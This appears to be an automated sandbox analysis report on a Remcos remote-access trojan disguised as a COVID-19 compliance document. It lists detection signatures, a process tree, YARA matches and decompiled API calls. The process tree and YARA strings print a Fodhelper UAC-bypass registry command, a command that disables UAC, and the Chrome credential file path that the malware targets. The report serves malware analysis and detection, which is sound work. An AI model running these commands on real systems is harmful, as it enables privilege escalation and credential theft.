Loading ...

Play interactive tourEdit tour

Analysis Report Customer Report on COVID-19 Non-Complaince. Doc.exe

Overview

General Information

Sample Name:Customer Report on COVID-19 Non-Complaince. Doc.exe
Analysis ID:295956
MD5:949409e8ecfaf8ae46bd325c7b5b9f8d
SHA1:2d4dd1f218791e433693601fa0df94cd3639b629
SHA256:5b1f1843bbb992e3d5c635aa69d8409de4ae4d3f04cf19994d8e953e99cf451a
Tags:COVID19exegeoZAF

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Yara detected Remcos RAT
Allocates memory in foreign processes
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w10x64
  • Customer Report on COVID-19 Non-Complaince. Doc.exe (PID: 6672 cmdline: 'C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe' MD5: 949409E8ECFAF8AE46BD325C7B5B9F8D)
    • notepad.exe (PID: 468 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6876 cmdline: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • cmd.exe (PID: 6852 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 1496 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • Xbuhnek.exe (PID: 3620 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: 949409E8ECFAF8AE46BD325C7B5B9F8D)
    • ieinstal.exe (PID: 1004 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • Xbuhnek.exe (PID: 7040 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: 949409E8ECFAF8AE46BD325C7B5B9F8D)
    • ieinstal.exe (PID: 4944 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\hubX.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9c:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\hubX.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\hubX.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x71:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x1825f:$str_a1: C:\Windows\System32\cmd.exe
    • 0x1827b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x1827b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x17963:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x17f67:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x17547:$str_b2: Executing file:
    • 0x182ff:$str_b3: GetDirectListeningPort
    • 0x17da7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x1809b:$str_b5: licence_code.txt
    • 0x18003:$str_b6: \restart.vbs
    • 0x17f27:$str_b8: \uninstall.vbs
    • 0x174d3:$str_b9: Downloaded file:
    • 0x174ff:$str_b10: Downloading file:
    • 0x171f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
    • 0x17563:$str_b12: Failed to upload file:
    • 0x1833f:$str_b13: StartForward
    • 0x18323:$str_b14: StopForward
    • 0x17e97:$str_b15: fso.DeleteFile "
    • 0x17efb:$str_b16: On Error Resume Next
    • 0x17e63:$str_b17: fso.DeleteFolder "
    • 0x1757b:$str_b18: Uploaded file:
    00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x1825f:$str_a1: C:\Windows\System32\cmd.exe
      • 0x1827b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x1827b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x17963:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x17f67:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x17547:$str_b2: Executing file:
      • 0x182ff:$str_b3: GetDirectListeningPort
      • 0x17da7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x1809b:$str_b5: licence_code.txt
      • 0x18003:$str_b6: \restart.vbs
      • 0x17f27:$str_b8: \uninstall.vbs
      • 0x174d3:$str_b9: Downloaded file:
      • 0x174ff:$str_b10: Downloading file:
      • 0x171f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
      • 0x17563:$str_b12: Failed to upload file:
      • 0x1833f:$str_b13: StartForward
      • 0x18323:$str_b14: StopForward
      • 0x17e97:$str_b15: fso.DeleteFile "
      • 0x17efb:$str_b16: On Error Resume Next
      • 0x17e63:$str_b17: fso.DeleteFolder "
      • 0x1757b:$str_b18: Uploaded file:
      0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        23.2.ieinstal.exe.10540000.2.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          23.2.ieinstal.exe.10540000.2.raw.unpackREMCOS_RAT_variantsunknownunknown
          • 0x1825f:$str_a1: C:\Windows\System32\cmd.exe
          • 0x1827b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x1827b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x17963:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x17f67:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x17547:$str_b2: Executing file:
          • 0x182ff:$str_b3: GetDirectListeningPort
          • 0x17da7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x1809b:$str_b5: licence_code.txt
          • 0x18003:$str_b6: \restart.vbs
          • 0x17f27:$str_b8: \uninstall.vbs
          • 0x174d3:$str_b9: Downloaded file:
          • 0x174ff:$str_b10: Downloading file:
          • 0x171f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
          • 0x17563:$str_b12: Failed to upload file:
          • 0x1833f:$str_b13: StartForward
          • 0x18323:$str_b14: StopForward
          • 0x17e97:$str_b15: fso.DeleteFile "
          • 0x17efb:$str_b16: On Error Resume Next
          • 0x17e63:$str_b17: fso.DeleteFolder "
          • 0x1757b:$str_b18: Uploaded file:
          23.2.ieinstal.exe.10540000.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            23.2.ieinstal.exe.10540000.2.unpackREMCOS_RAT_variantsunknownunknown
            • 0x1765f:$str_a1: C:\Windows\System32\cmd.exe
            • 0x1767b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x1767b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x16d63:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x17367:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x16947:$str_b2: Executing file:
            • 0x176ff:$str_b3: GetDirectListeningPort
            • 0x171a7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x1749b:$str_b5: licence_code.txt
            • 0x17403:$str_b6: \restart.vbs
            • 0x17327:$str_b8: \uninstall.vbs
            • 0x168d3:$str_b9: Downloaded file:
            • 0x168ff:$str_b10: Downloading file:
            • 0x165f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
            • 0x16963:$str_b12: Failed to upload file:
            • 0x1773f:$str_b13: StartForward
            • 0x17723:$str_b14: StopForward
            • 0x17297:$str_b15: fso.DeleteFile "
            • 0x172fb:$str_b16: On Error Resume Next
            • 0x17263:$str_b17: fso.DeleteFolder "
            • 0x1697b:$str_b18: Uploaded file:
            20.2.ieinstal.exe.10540000.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 25 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Fodhelper UAC BypassShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f, CommandLine: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1240, ProcessCommandLine: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f, ProcessId: 6876

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeReversingLabs: Detection: 10%
              Multi AV Scanner detection for submitted fileShow sources
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeReversingLabs: Detection: 10%
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 4944, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 1004, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 1496, type: MEMORY
              Source: Yara matchFile source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 23.2.ieinstal.exe.10540000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
              Source: 23.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
              Source: 12.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
              Source: 20.2.ieinstal.exe.10540000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
              Source: 20.2.ieinstal.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
              Source: 12.2.ieinstal.exe.10540000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
              Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_5048518C
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00404C0A
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040751B ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040751B
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t12_2_00410586
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040728F ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@